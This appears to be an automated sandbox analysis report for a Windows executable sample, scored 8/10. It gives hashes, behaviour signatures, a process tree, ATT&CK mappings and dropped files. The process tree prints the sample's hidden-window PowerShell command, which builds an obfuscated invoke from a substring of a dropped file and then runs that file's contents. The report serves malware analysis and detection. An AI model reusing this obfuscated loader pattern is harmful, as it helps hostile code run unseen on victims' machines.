Analysis

  • max time kernel
    129s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 01:29

General

  • Target

    86d74d655679ee232b8fcf1a0013a17972b6b93aed25ae8beccd5864a9a1ecbe.exe

  • Size

    531KB

  • MD5

    fe3bcba4cdc4ae741ee54de500496669

  • SHA1

    e27ac7c118efb35b85abf8dc4300a6291737dea2

  • SHA256

    86d74d655679ee232b8fcf1a0013a17972b6b93aed25ae8beccd5864a9a1ecbe

  • SHA512

    d337947fcb86f48b30e676b105c584811723dacf16ce3af4cdac70607a239d9b5aaf93b0abd54754cc7801cac7a86fd7da293655d0dcfa4de32147df75ae9ff8

  • SSDEEP

    6144:+Y8i9d6ihOq761Mymf40IoBdLlNZ4DYvP+TV5lKiecmMlGvtClbUpEjoltWucv:8K6+L761MymflCYX+EixjlGHu8ltWuq

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\86d74d655679ee232b8fcf1a0013a17972b6b93aed25ae8beccd5864a9a1ecbe.exe
    "C:\Users\Admin\AppData\Local\Temp\86d74d655679ee232b8fcf1a0013a17972b6b93aed25ae8beccd5864a9a1ecbe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5068
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Treholdsskiftet=Get-Content 'C:\Users\Admin\AppData\Roaming\fertiliseringer\Hudflettende\Strapper\Swallowling.Pre';$Skiameter=$Treholdsskiftet.SubString(55621,3);.$Skiameter($Treholdsskiftet)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:3964
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 2576
          3⤵
          • Program crash
          PID:2180
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4640 -ip 4640
      1⤵
        PID:1740

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gknk1tl2.4mc.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\fertiliseringer\Hudflettende\Strapper\Swallowling.Pre
        Filesize

        54KB

        MD5

        22252e2ecc5fad588b2a1855271240d7

        SHA1

        16e3f7b4f36b0804f372e9dc199748eced0be25c

        SHA256

        d82ec244a3f9172ac6eb88f87b46147b085b1ef3cd0b1787cb7029f5eeef74c0

        SHA512

        98ca2f227d5e8e32a098f8c98c432f1693617196ca3dfd81404ff247a8e8254c631cc291965b0a8fb724798c98bc4dc65963d23c81ebbbd7762acb391b4361a0

      • memory/4640-33-0x0000000005510000-0x0000000005864000-memory.dmp
        Filesize

        3.3MB

      • memory/4640-34-0x0000000005AA0000-0x0000000005ABE000-memory.dmp
        Filesize

        120KB

      • memory/4640-21-0x0000000004A90000-0x0000000004AB2000-memory.dmp
        Filesize

        136KB

      • memory/4640-22-0x0000000004D60000-0x0000000004DC6000-memory.dmp
        Filesize

        408KB

      • memory/4640-23-0x00000000054A0000-0x0000000005506000-memory.dmp
        Filesize

        408KB

      • memory/4640-19-0x00000000730B0000-0x0000000073860000-memory.dmp
        Filesize

        7.7MB

      • memory/4640-17-0x00000000730BE000-0x00000000730BF000-memory.dmp
        Filesize

        4KB

      • memory/4640-20-0x0000000004E00000-0x0000000005428000-memory.dmp
        Filesize

        6.2MB

      • memory/4640-35-0x0000000005B10000-0x0000000005B5C000-memory.dmp
        Filesize

        304KB

      • memory/4640-38-0x0000000006000000-0x0000000006022000-memory.dmp
        Filesize

        136KB

      • memory/4640-37-0x0000000005FB0000-0x0000000005FCA000-memory.dmp
        Filesize

        104KB

      • memory/4640-39-0x0000000007270000-0x0000000007814000-memory.dmp
        Filesize

        5.6MB

      • memory/4640-18-0x0000000002480000-0x00000000024B6000-memory.dmp
        Filesize

        216KB

      • memory/4640-36-0x0000000006C20000-0x0000000006CB6000-memory.dmp
        Filesize

        600KB

      • memory/4640-41-0x0000000007EA0000-0x000000000851A000-memory.dmp
        Filesize

        6.5MB

      • memory/4640-43-0x00000000730B0000-0x0000000073860000-memory.dmp
        Filesize

        7.7MB